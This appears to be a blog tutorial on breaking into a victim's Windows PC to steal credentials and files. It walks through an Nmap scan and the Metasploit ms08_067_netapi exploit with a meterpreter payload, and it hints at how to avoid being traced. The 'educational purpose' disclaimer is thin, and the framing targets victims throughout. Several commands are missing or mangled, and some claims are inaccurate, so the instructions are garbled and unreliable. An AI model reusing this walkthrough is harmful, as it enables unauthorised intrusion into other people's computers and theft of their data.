Hey guys, today in this article I am going to talk about hacking a computer using metasploit. I think, I have already mentioned about metasploit in one of my article. Here I will give a general description on how it works and to use it efficiently to hack into a PC and steal credentials
But remember, this is only for educational purpose and hence damaging any victim’s computer is at your own risk.
Note: The hacker can be traceable and hence additional techniques are required to make yourself safe!
So here goes the requirements and the procedure to hack into a PC.
- Metasploit (Available at metasploit.org)
- Nmap (Port scanner available at nmap.org)
- Debian Linux OS (Learn more)
- IP of the victim’s computer.
Introduction to attack:
Nmap is a port scanner used to scan a computer to locate the open ports. The ports are the path for the information that we need to steal. For a normal computer usually 30-40 ports are kept open.To find the number of ports open on your computer open command prompt (Start>Command prompt) and type
netstat -ano and hit enter, you will get a list of open ports in your computer. You need to have a basic knowledge on ports and port numbers to perform this attack.
Using a tool such as Metasploit we can spoof into the PC and steal the information from the corresponding port using commands. Learn to use Metasploit at http://www.metasploit.com/learn-more/how-do-i-use-it/.
We use Linux because it is the best OS for hackers. And you must know to use terminal on Linux, since we perform this attack on command lines.
Step 1: At first we are going to port scan the computer. For this we need to open Nmap and type the following command.
nmap -sS -O
In the place ofip> you have to write the victims ip address. If you see the ports 139 and 445 open then you can go ahead.
Step 2: Now we have to open Metasploit (via terminal) and run it.
Type the following command to get the exploits in the victim’s computer.
You will get a list of exploits in the victim’s computer. which looks similar to ms05_039_pnp. Every such exploit correspond to different function. We are interested in an exploit which looks like this ms08_067_netapi. So we give a command as shown below.
Step 3: Now we use RHOST command to set the target ip.
And RPORT command to access port 445
set RPORT 445
Step 4: And now we give a command as
set SMBPIPE SRVSVC
set TARGET 0
Step 5: Now we got to set the payload hence the following command.
set PAYLOAD windows/meterpreter/bind_tcp
Step 6: Time for the BIG BANG…! Type exploit and hit enter.
If you find the message which looks closer to “Meterpeter session 1 opened” then that implies you are done. You have successfully hacked into the computer.
Now by using different commands we can steal the files on that system!